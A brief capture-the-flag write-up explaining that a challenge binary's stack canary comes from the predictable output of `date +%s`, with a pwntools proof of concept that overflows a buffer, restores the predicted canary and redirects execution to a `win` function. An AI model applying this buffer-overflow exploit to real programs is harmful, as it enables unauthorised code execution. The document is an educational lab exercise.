# Canary  Main function will execute command `date +%s` and turn the return value into an int, which will be a canary value to prevent stack overflow in `read_in`. What we can do is knowing that canary by executing `date +%s`, and use that value to bypass the canary protection. Then all we need to do is overwrite return address to `win` function address and cat the flag. ## POC ```python from pwn import * r = process(["date", "+%s"]) canary = int(r.recvline(0).decode()) win = 0x8049296 r = process("./canary") payload = b'A' * 0x2c + p32(canary) + b"B" * 0xc + p32(win) r.sendline(payload) r.interactive() ```